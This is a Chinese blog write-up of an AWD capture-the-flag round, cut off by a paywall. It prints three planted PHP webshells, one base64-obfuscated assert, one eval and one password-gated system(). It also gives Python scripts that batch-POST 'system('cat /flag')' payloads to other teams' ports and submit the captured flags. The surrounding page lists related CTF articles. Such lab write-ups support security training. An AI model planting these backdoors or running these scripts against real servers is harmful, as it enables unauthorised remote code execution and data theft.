AWD-simple

最新推荐文章于 2023-10-02 19:29:57 发布
最新推荐文章于 2023-10-02 19:29:57 发布
阅读量382 收藏 2
点赞数
分类专栏: 比赛 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LLKJSAF/article/details/109632438
版权

AWD

simple

启示:新收获,体会到了AWD的乐趣

尽管笔者还是很菜,但是事后学会写批量化脚本成功后,还是体会到了AWD的乐趣,有点意思~

准备工作:
通过WinSCP(Xshell等)连接登录后,备份/var/www/html,将此目录下的所有文件拖入D盾,发现部分漏洞。👇

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xtLfe397-1605103291707)(/temp/AWD/simple/D.jpg)]

挨个修叭

1

.config_common.php

<?php 
error_reporting(0);
set_time_limit(0);
$a=base64_decode("Y"."X"."N"."z"."Z"."X"."J"."0");
$a(@${"_P"."O"."S"."T"}[520]); 
?>

简单分行后,将’YXNzZXJ0’进行base64加密后得’assert’,即assert(@$_POST[520]);,意为传入一个名为520的变量,方式为POST传参,后以PHP代码的方式执行。

因此,在网站上尝试POST传参’520=system(‘cat /flag’);'后可得flag。👇

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-gSr3IIc6-1605103291709)(/temp/AWD/simple/config_common.jpg)]

接下来就是批量化的过程,明确思路:

1.攻击端口

port_start=8801
port_end=8808
my_port=8802
flag=[]
token='1f208fe1a06b1d6db7ff6b7a7db3aefe'

2.获取flag

def config_common(i):
    attack_url='http://XXX:'+ str(i) +'/.config_common.php'
    data={"520":"system('cat /flag');"}
    req=requests.post(url=attack_url,data=data)
    print(req.text)
    flag.append(req.text)
    #print(flag)
    exception(req)

3.提交flag

for i in range(port_start,port_end+1):
    if(i==my_port):
        continue
    else:
        config_common(i)
        #pdd(i)
        #function111(i)
        #function4eff2(i)
        #ciscn_notes(i)
        #ciscn_config2(i)
        #ciscn_include2(i)
        #ciscn_url(i)
        #ciscn_include(i)#冰蝎
        #ciscn_config1(i)
        submit_url='http://XXX:9090/'
        for i in flag:
            submit_flag={'flag':i,'token':token}
            requests.post(url=submit_url,data=submit_flag)
time.sleep(60*5)

其中还包括异常处理的部分,可逐步完善。

2

pdd.php

<?php @eval($_REQUEST["pdsdt"]);?>

与第一题大同小异,网页命令同为’pdsdt=system(‘cat /flag’);’

贴脚本,相同部分不再赘述:

def pdd(i):
    attack_url='http://XXX:'+ str(i) +'/pdd.php'
    data={"pdsdt":"system('cat /flag');"}
    req=requests.post(url=attack_url,data=data)
    print(req.text)
    flag.append(req.text)
    #print(flag)
    exception(req)

3

111.php

<?php
$pass=$_POST["password"];
if($pass == "4eff2c041976ea22afb7092a53188c70")
	{
		system($_GET["getshell"]);
		readfile("/flag");
	}
else
	{
		echo "be1c5ff7101b7791469b5df2315cf75a";
	}
?>

POST传入一个名为password的变量赋值给pass,若该变量(password=>pass)==“4eff2c041976ea22afb7092a53188c70”,则系统自动返回根目录下flag的操作;若不是,则返回假的flag。

脚本如下:

def function111(i):
    attack_url='http://XXX:'+ str(i) +'/uploads/.111.php'
    data={"password":"4eff2c041976ea22afb7092a53188c70"}
    req=requests.post(url=attack_url,data=data)
    print(req.
最低0.47元/天 解锁文章
煤矿路口西_CTF小学生
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CTF中AWD的waf 用于防止别人读取flag ,经过实战检验
10-08
CTF中AWD的waf 用于防止别人读取flag 。 PHP版本,经过AWD实战。 可用于各种环境下的CTF线下赛
awd-watchbird:适用于AWD的功能强大PHP WAF
03-19
(但请注意规则是否允许第三方通防)守望者版本1.4适用于AWD的功能强大PHP WAF功能:易于配置(单文件,无需加载外部js / css)可以随时开启/关闭某项防御基本防御:数据库注入(SQL注入)文件上传(上传)文件包含...
PHP的libcurl中存在的一些问题
3569
12-22 3867
http://wonderkun.cc/index.html/?p=670 看了近来的几场ctf题目,学习了一些关于php libcurl的一些知识,在这里总结一下。 0x1发送POST请求时造成任意文件读取 PHP manual上对CURLOPT_POSTFIELDS 这个选项的描述如下: 也就是说当CURLOPT_POSTFIELDS传入的数据是urlencode 的字
网络安全小赛
最新发布
一大口木的博客
10-02 159
例如,file:///path/to/file 表示本地文件系统上的文件,file://hostname/path/to/file 表示远程服务器上的文件。需要注意的是,php://file 只能在 PHP 脚本中使用,而 file:// 则是通用的文件访问协议,可以在各种环境中使用。总结起来,file:// 是通用的文件访问协议,而 php://file 是 PHP 内置的封装协议,提供了更丰富的文件操作功能。题解猜测是文件名字!这样没反应,可能是#%的问题,有两种解决方案,1是url编码,2是*或者?
文件包含--简单的代码审计绕过
1stPeak's Blog
11-30 739
解题思路: 查看页面的每个链接都有些什么,最后目标锁定在flag.php上 页面显示如下: 页面下方源码如下: 源码分析: $file = @$_GET['page']; //将url变量page的值赋给$file $url = parse_url($file); //parse_url函数用于解析整个URL,并返回其组成部分,举例如下图 if(strstr($file,'flag.tx...
SQL正则盲注
qq_45521281的博客
05-15 774
题目链接: 地址 随便输入用户名和密码后登录,跳到check.php页面 下面是题目源码 <?php include "config.php"; error_reporting(0); highlight_file(__FILE__); $check_list = "/into|load_file|0x|outfile|by|substr|base|echo|hex|mid|like|or|char|union|or|select|greatest|%00|_|\'|admin|limit|
awd-platform-master.zip
09-07
awd-platform-master.zip】是一个压缩包文件,包含了一个名为"awd-platform-master"的项目。这个项目主要用于搭建CTF(Capture The Flag)比赛中的AWD(Attack-Defend)训练平台。在网络安全领域,CTF是一种流行的...
awd-platform(AWD攻防平台)
03-16
# AWD线下环境启动说明 by Hence Zhang @Lancet github上的项目,搬运了一下
CTF-AWD-WEB:AWD 模式下的WEB试题仓库
05-17
在"CTF-AWD-WEB"中,重点在于Web安全领域,涵盖了各种Web应用漏洞和防护技巧。 本资源"CTF-AWD-WEB"是一个包含了多个AWD模式下Web试题的仓库,这些试题可能来源于不同的CTF线下赛事。通过这些试题,学习者可以深入...
网络攻防比赛平台源码(AWD-platform源码).7z
06-19
一个awd攻防比赛的裁判平台。 版本:beta v2.0 开发语言:python3 + django 平台分为两个部分 裁判机 靶机 通过特定接口,来实现靶机flag与服务器的通信 搭建流程 裁判机 安装所需环境 裁判机:python3+django ...
SQL正则盲注-regexp
cc菜的一批
12-26 1301
下面是题目源码 <?php include "config.php"; error_reporting(0); highlight_file(__FILE__); $check_list = "/into|load_file|0x|outfile|by|substr|base|echo|hex|mid|like|or|char|union|or|select|greatest|%00|...
AWD 比赛小技巧 & 套路总结
algae
04-18 3935
AWD 比赛小技巧 & 套路总结 AWD 类型的线下赛我觉着靠的是平时积累的技巧和万年的手速(脚本),见的多了碰到问题应付起来就会容易些; 网上也有好多师傅们写的技巧,文末附上链接; 这篇临时写给某位伙计; List 1、备份。源码以及数据库,可以备份到隐蔽的目录(.xx)下,顺便down到本地(Win下:Winscp,FileZilla;Mac:scp,Transmit..); 2...
CTF - AWD (Attack with Defense) 线上下赛 攻防平台
微风飘呀飘
05-28 5751
Ti0sAWD是由 Ti0s-Team 开发的 awd 竞技攻防平台,使用 PHP + Mysql 编写。 本程序可以作为 CTF 线上 线下比赛平台,亦可用于团队内部 AWD 模拟训练 推荐服务器 4H8G + 20G + Centos 网站架构: 前端:Materialize CSS +jQuery +部分Bootstrap,采用Html + Ajax动态刷新页面 后端:纯PHP 数据库:Mysql Awd 网络攻防竞技系统模式 基于Docker服务的Aw...
AWD比赛入门攻略总结
鹿鸣天涯
09-28 4364
AWD比赛入门攻略总结
(1)AWD入门攻略大纲
大表哥的博客
12-09 5614
AWD入门知识总结
浅谈AWD攻防赛的生存攻略
鹿鸣天涯
09-28 4959
AWD:Attack With Defence,即攻防对抗,比赛中每个队伍维护多台服务器(一般两三台,视小组参赛人数而定),服务器中存在多个漏洞(web层、系统层、中间件层等),利用漏洞攻击其他队伍可以进行得分,加固时间段可自行发现漏洞对服务器进行加固,避免被其他队伍攻击失分。
反序列化的时候出现eof exception_typecho老版本的反序列化研究
weixin_39585761的博客
11-29 157
原创: p0desta 合天智汇 虽然自己也水了些CVE,但是并没有自己满意的、漂亮的漏洞利用链,今天呢主要是自己还没审出过反序列化漏洞,所以找了typecho老版本来审一下。正文在install.php第246行会反序列化操作$config = unserialize(base64_decode(Typecho_Cookie::get('__typecho_config')));$ty...
Typecho 反序列化漏洞导致前台 getshell
weixin_34161083的博客
11-17 217
前言最早知道这个漏洞是在一个微信群里,说是install.php文件里面有个后门,看到别人给的截图一看就知道是个PHP反序列化漏洞,赶紧上服务器看了看自己的博客,发现自己也中招了,相关代码如下:然后果断在文件第一行加上了die:<?phpdie('404NotFound!');?>今天下午刚好空闲下来,就赶紧拿出来代码看看。漏洞分析先从install.ph...
通过两道CTF题学习过滤单引号的SQL注入
热门推荐
Lethe's Blog
03-24 1万+
0x00 前言 通常来说,在进行字符型的SQL注入时,都需要先将前面的引号等(以单引号为例)进行闭合才能执行我们构造的SQL语句,那么如果单引号被过滤了,是否还能够成功的SQL注入呢? 答案是可以,当你在判断登录时使用的是如下SQL语句: select user from user where user='$_POST[username]' and password='$_POST[passwor...
Traceback (most recent call last): File "/home/kali-2/桌面/awd-platform/batch.py", line 135, in <module> main() File "/home/kali-2/桌面/awd-platform/batch.py", line 110, in main password = generate_pass(i+1) ^^^^^^^^^^^^^^^^^^ File "/home/kali-2/桌面/awd-platform/batch.py", line 13, in generate_pass passwd = hashlib.md5(salt + str(time.time()) + str(teamno)).hexdigest() ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ TypeError: Strings must be encoded before hashing
06-06
这是一个 TypeError 错误。在 Python 3 中,`hashlib.md5()` 函数需要将字符串编码为字节类型。你需要使用字符串的 `encode()` 方法将其转换为字节类型。例如,将 `hashlib.md5(salt + str(time.time()) + str(teamno)).hexdigest()` 修改为 `hashlib.md5((salt + str(time.time()) + str(teamno)).encode()).hexdigest()`。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值